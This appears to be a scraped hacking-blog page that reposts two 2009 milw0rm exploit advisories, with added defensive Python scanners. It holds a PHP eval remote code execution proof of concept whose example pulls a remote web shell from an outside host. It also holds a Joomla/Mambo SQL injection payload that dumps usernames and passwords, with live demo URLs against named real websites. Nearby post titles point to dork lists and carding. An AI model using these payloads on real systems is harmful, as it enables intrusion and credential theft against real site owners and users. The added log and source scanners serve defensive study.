Shell injection

Posted on 08.19 by CS-31


SQL DORKS LIST + VULN SITE

Posted on 08.06 by CS-31


exploit live cat

Posted on 10.10 by CS-31


bug website

Posted on 10.00 by CS-31


#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################

[+] Remote PHP Code Execution

- Vulnerable code in system/services/init.php :

---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------

- PoC :

http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]

- Example :

http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";

- Example 2 :

http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();

#################################################################################################################

# milw0rm.com [2009-06-03]
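
For defenders auditing a PHP code base for the pattern quoted in the advisory above (request input passed to `eval`), the following is an added example and is not part of the advisory or the affected project. The function names and the sample source are constructed for illustration; the scan is a regex heuristic with one level of flow-insensitive assignment tracking, not a full PHP parser.

```python
import re

# Request data an HTTP client controls directly.
SUPERGLOBAL = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b")
# Sinks that run a string as PHP code (assert() did so before PHP 8).
SINK = re.compile(r"\b(eval|assert|create_function)\s*\(", re.IGNORECASE)
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?!=)\s*([^;]*);")
VAR = re.compile(r"\$[A-Za-z_]\w*")

def balanced_args(src, open_idx):
    """Text between the '(' at open_idx and its matching ')'.
    Parentheses inside string literals are not special-cased."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    return src[open_idx + 1:]  # unbalanced: take the rest of the file

def find_request_eval(src):
    """Return [(line_no, sink, argument)] for sinks fed by request data."""
    tainted = set()
    # $x = ... $_GET[...] ...; marks $x as tainted (wrappers do not sanitise).
    for m in ASSIGN.finditer(src):
        rhs = m.group(2)
        if SUPERGLOBAL.search(rhs) or any(v in tainted for v in VAR.findall(rhs)):
            tainted.add(m.group(1))
    findings = []
    for m in SINK.finditer(src):
        arg = balanced_args(src, m.end() - 1)
        if SUPERGLOBAL.search(arg) or any(v in tainted for v in VAR.findall(arg)):
            line_no = src.count("\n", 0, m.start()) + 1
            findings.append((line_no, m.group(1).lower(), arg.strip()))
    return findings

# Constructed sample; line 3 mirrors the line quoted in the advisory.
SAMPLE = """<?php
// constructed sample for the scanner
@eval(stripslashes($_REQUEST['anticode']));
$tpl = 'return 1 + 1;';
eval($tpl);
$cb = base64_decode($_POST['cb']);
assert($cb);
"""

if __name__ == "__main__":
    for finding in find_request_eval(SAMPLE):
        print(finding)
```

Any hit should be treated as a code-execution sink to remove outright; wrapping the input in `stripslashes` or a decoder does not make it safe to evaluate.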

Joomla Component com_mosres

Posted on 10.39 by CS-31

==================================================================================
Joomla Component com_mosres (property_uid) SQL injection Vulnerability
==================================================================================



###################################################
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)
[+] Email : chipdebios[alt+64]gmail.com

###################################################

Conditions : magic_quotes_gpc = Off
---------------------------------------------------
Example Joomla:
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code]

[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

Live Demo:
http://ahtopolbg.com/index.php?option=com_mosres&catID=1004&regID=2&task=viewproperty&property_uid=null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

---------------------------------------------------
Example Mambo:
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code]

[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*

Live Demo:
http://www.velingradbg.com/index.php?option=com_mosres&task=viewproperty&property_uid=1005%27%20and%201=2%20union%20select%201,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*

**************************
however, still looking ... component, can be injected in several places (not all or always).
Almost always SQL injection & also blind sql injection.
I let you work ;)

http://www.ahtopolbg.com/index.php?option=com_mosres&task=showregion&regID=4%27+and+1=2+union%20select%201,concat(username,0x3a,password)+from+jos_users/*&lang=bg

**************************


+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++




Mos Res
23/02/2005
Vince Wooll
This component is released under the GNU/GPL License
mosres@woollyinwales.co.uk
http://www.mosres.net
1.0f
Mambo Resident component for v4.5.2

# milw0rm.com [2009-06-03]
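
To check web server logs for requests of the kind described in the advisory above, the following added example (not part of the advisory or of the component) flags `com_mosres` requests whose identifier parameters are not plain integers. It assumes `property_uid`, `regID` and `catID` are integer ids and that logs are in common/combined format; the log lines are constructed and use documentation IP ranges.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined log format: client, request target, status.
REQUEST = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# Assumption: these com_mosres parameters are plain integer ids.
NUMERIC_PARAMS = ("property_uid", "regID", "catID")
SQL_HINT = re.compile(
    r"union\s+(?:all\s+)?select|information_schema|/\*|--", re.IGNORECASE)

def check_line(line):
    """Return a finding dict for a suspicious com_mosres request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    # parse_qs percent-decodes values and turns '+' into a space.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_mosres" not in query.get("option", []):
        return None
    bad = {name: value for name in NUMERIC_PARAMS
           for value in query.get(name, [])
           if not re.fullmatch(r"[0-9]+", value)}
    if not bad:
        return None
    return {"client": client, "status": int(status), "params": bad,
            "sql_keywords": any(SQL_HINT.search(v) for v in bad.values())}

def scan(log_text):
    """Run check_line over every line and keep the findings."""
    return [f for f in map(check_line, log_text.splitlines()) if f]

# Constructed log lines (not from a real server).
SAMPLE_LOG = """\
192.0.2.10 - - [03/Jun/2009:10:00:01 +0000] "GET /index.php?option=com_mosres&task=viewproperty&property_uid=1005 HTTP/1.1" 200 5120
198.51.100.7 - - [03/Jun/2009:10:00:09 +0000] "GET /index.php?option=com_mosres&task=viewproperty&property_uid=1005%27%20and%201=2%20union%20select%201,2/* HTTP/1.1" 200 4301
198.51.100.7 - - [03/Jun/2009:10:00:15 +0000] "GET /index.php?option=com_mosres&task=showregion&regID=4%27+and+1=2&lang=bg HTTP/1.1" 200 3988
203.0.113.5 - - [03/Jun/2009:10:01:00 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 900
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The third sample line contains no `union select`, so a keyword signature alone would miss it; the integer allowlist still flags it, which is also the validation the component should apply before the value reaches a query.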

The Carding

Posted on 09.11 by CS-31
